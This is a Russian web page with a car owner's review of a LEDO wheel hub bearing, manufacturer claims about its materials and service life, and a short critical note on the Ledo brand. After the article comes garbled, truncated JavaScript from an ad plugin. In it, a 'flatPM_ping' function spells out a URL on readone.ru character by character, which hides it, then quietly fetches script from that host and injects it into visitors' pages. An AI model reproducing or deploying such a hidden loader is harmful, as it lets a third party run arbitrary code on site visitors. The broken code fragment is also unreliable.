Ledo отзывы о запчастях

Всем доброго дня!

Пишу данный отзыв сразу после замены. Память плохая, времени свободного немного имеется, поэтому сразу чтобы не забыть.

Загудела у меня ступица передняя левая, сначала потихоньку, я из-за неё грешил на новую летнюю резину — думал шумнавата (www.drive2.ru/l/508256672716686048/). Потом естественно стало гудеть громче (пробег примерно 98т/км). И вот появилась возможность уделить ей время. Симптомы проявились в следующем: поворачиваешь руль на поворотах в право гудит сильно, а когда влево то практически не слышно. По прямой шум начинался примерно с 40 км/ч

Впервые столкнулся с подшипником ступицы, который интегрированный — изготавливается и соответственно продаётся только в сборе. Раньше я менял только подшипник в ступицах но они менялись отдельно и стоили конечно дешевле.

Естественно начал читать отзывы о различных производителях и ценах. Читал много форумов, и пришёл к следующему: рекомендуют помимо оригинала (по vin у меня бился артикул Nissan 40202JG01B — цена 4275 р.), SKF VKBA6996 цена 3993 р. и ещё NTN R16873 — цена 4681р. или SNR R16873 — цена 3774 р. Как многие пишут, эти ступицы устанавливают на заводе. Правды я не знаю, но анализируя видно, что средняя цена 4000 р.

Решил я поискать хорошие аналоги подешевле, но не уступающие по качеству — и наткнулся вот на какую ступицу производителя LEDO артикул 80043LCHB цена 2100 р. (ledo24.ru/catalogue/stupi…dnego-kolesa-043lchb-ledo)

О данном производителе раньше не слышал вообще ничего. В связи с этим решил поковырять интернет в поисках положительных или отрицательных отзывов. Скажу честно информации не много, но нашёл несколько отзывов внушающие позитивный настрой для приобретения этой ступицы. Чтобы мои слова не были пустой болтовнёй, напишу несколько отзывов, наверняка кому-то пригодятся.

Первый irecommend.ru/content/za-…dengi-otlichnaya-stupitsa. Покупатель пишет "Визуально ступица LEDO выглядела гораздо приличнее, чем я видел на авторынке. Вся в смазке, подшипник хорошо крутился: равномерно, без зацепов и люфтов. Шлицевая часть ступицы прокалена, что не было на других аналогах с авторынка." Накатал данный покупатель 30 т/км, проблем не возникло.

Далее нашёл отзывы официальному магазину www.yell.ru/spb/com/ledo-autoparts-shop_10784474/ в одном из комментариев Серж пишет, что ступица встала как оригинальная, уже проехал на ней с октября по март и также полет отличный.

Ну и на последок www.drive2.ru/l/5956243/ владельцы Митсубиси Паджеро тоже отмечают отличное качество ступиц LEDO.

В общем недолго я ломался, сделал заказ — это было поздно ночью. На утро следующего дня мне позвонил представитель магазина для подтверждения заказа. Я попросил его проверить по вин номеру подходит ли это ступица мне или нет. По оригинальному каталогу бился другой артикул с буквой А на конце. Он идёт как заменитель, поэтому я принял решение брать. Тем более продавец сказал, если не подойдёт- сделаете возврат, но чтобы не было следов установки. Заказал доставку, стоимость которой 200 р. и мне привезли ступицу в назначенное время и место. Магазину пять баллов, сработали отлично.

Характеристики и стандарты качества ступиц LEDO

Ступицы LEDO – качество используемых материалов

1. Основу ступиц LEDO составляет сталь 55 марки – высококачественная углеродистая конструкционная сталь. Данная сталь соответствует российскому стандарту ГОСТ 1050-88 и европейскому стандарту 1CS55. Химический состав используемой стали приведен в таблице 1.

2. Шпильки ступиц LEDO выполнены из легированной стали 35ХМЛ (35CrMo) и соответствуют классу прочности 10.9 – максимальный класс прочности, применяемый для штатного автомобильного крепежа.

3. Подшипники для ступиц LEDO изготавливаются на современном шарикоподшипниковом заводе, один из лидеров на мировом рынке. Данный завод производит подшипники для таких известных брендов, как FAG, NTN, KOYO.

4. Смазка ступиц LEDO – специально разработанная смазка для ступичных подшипников японского производителя KYODO YUSHI (Япония). Смазка устойчива к экстремально низким и высоким температурам, что актуально для климата большей части России. Смазка KYODO YUSHI также повышает износостойкость и противозадирные свойства. Предотвращает попадание влаги, повышает устойчивость к окислению и коррозии металла.

5. Датчики ABS для ступиц LEDO импортированы из Германии (made in Germany). Каждая ступица с интегрированным датчиком ABS после финальной сборки проходит 100% тестирование на компьютерном стенде.

Таблица 1. Химический состав применяемой стали

Ступицы LEDO – преимущества

КОМПЛЕКТУЮЩИЕ LEDO: Комплектующие для автомобильных ступиц LEDO соответствуют требованиям оригинальной продукции. Качественная высокопрочная сталь, надежные подшипники, износостойкая и противозадирная смазка из Японии, датчики ABS для ступиц LEDO импортируются из Германии.

ОБОРУДОВАНИЕ LEDO: Применяется современное и технологичное оборудование для производства ступиц LEDO – высокоточные токарные станки с системой электронного управления от Mitsubishi Electric.

ГАРАНТИЯ КАЧЕСТВА LEDO: Гарантированный срок службы ступиц LEDO составляет 50.000 километров (при соблюдении требований по эксплуатации и установке ступиц). Ступицы LEDO имеют международный сертификат ISO, сертификат EAC и соответствуют требованиям технического регламента ТР ТС 018/2011 "О безопасности колесных транспортных средств".

Ступицы LEDO – срок службы

Срок службы качественно собранной ступицы колеса чаще всего определяется сроком службы установленного подшипника (при его наличии). Срок службы ступиц LEDO составляет более 80.000 километров пробега. При этом на срок службы ступицы дополнительно влияет два очень важных фактора:

  • Момент затяжки центральной гайки ступицы;
  • Условия внешней среды эксплуатации автомобиля.

При не соблюдении момента затяжки ступицы, в случаях когда гайка перетянута, происходит "зажим" подшипника ступицы. В следствие чего, происходит повышенный износ подшипника – увеличивается трение и нагрев подшипника, начинает выгорать смазка и подшипник ступицы в скором времени выходит из строя (подшипник ступицы может "выгореть" буквально за несколько тысяч километров). При слабой затяжки появляются лишние люфты и биение, что также оказывает влияние на срок службы ступицы колеса в целом. Условия внешней среды – это погодные условия и качество дорожного покрытия. Частая езда при экстремально низких/высоких температурах, по пескам, болотистой местности и прочее, также может сокращать срок службы ступицы колеса. В данном случае очень важно применять при изготовлении ступиц качественную смазку – в ступицах LEDO используется специальная японская смазка KYODO YUSHI.

Ledo – отечественная компания, под именем которой можно найти широкий ассортимент оптики и автомобильных аксессуаров. По факту, это поставщик продукции как известных производителей (Hella, AVS и прочих), так и небольших азиатских фирм. Все поставляемые товары удовлетворяют требованиям отечественных стандартов.

В каталогах Ledo автолюбители найдут лампы (ксенон, галоген и LED), инверторы, щетки стеклоочистителей, товары для тюнинга и дооснащения, подсветку салона, дверей и номеров, а также некоторые автозапчасти – датчики, блоки управления фарами, ступицы, клапаны, топливные насосы и подшипники. К несчастью, автозапчасти Ledo не могут похвастать стабильно высоким качеством. Большая часть автолюбителей негативно отзывалась об оптике Ledo, отмечая ее небольшой эксплуатационный ресурс. Одной из ключевых особенностей запчастей под именем данной марки является цена – она одна из самых низких на вторичном рынке.

В целом, запчасти Ledo является бюджетным, но не самым качественным решением по автомобильной оптике. В силу небольшого эксплуатационного ресурса, оптику российской марки можно рекомендовать лишь в двух случаях: когда бюджет автолюбителя сильно ограничен и когда он хочет произвести недорогой предпродажный ремонт транспортного средства.

Оцените статью
ПК Знаток
Добавить комментарий

Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};
C Si Mn P Cr Ni Mo Cu Al Ti S V Nb W B
0.55 0.26 0.64 0.017 0.028 0.007 0.002 0.024 0.017 0.007 0.007 0.002 0.001 0.001 0.0001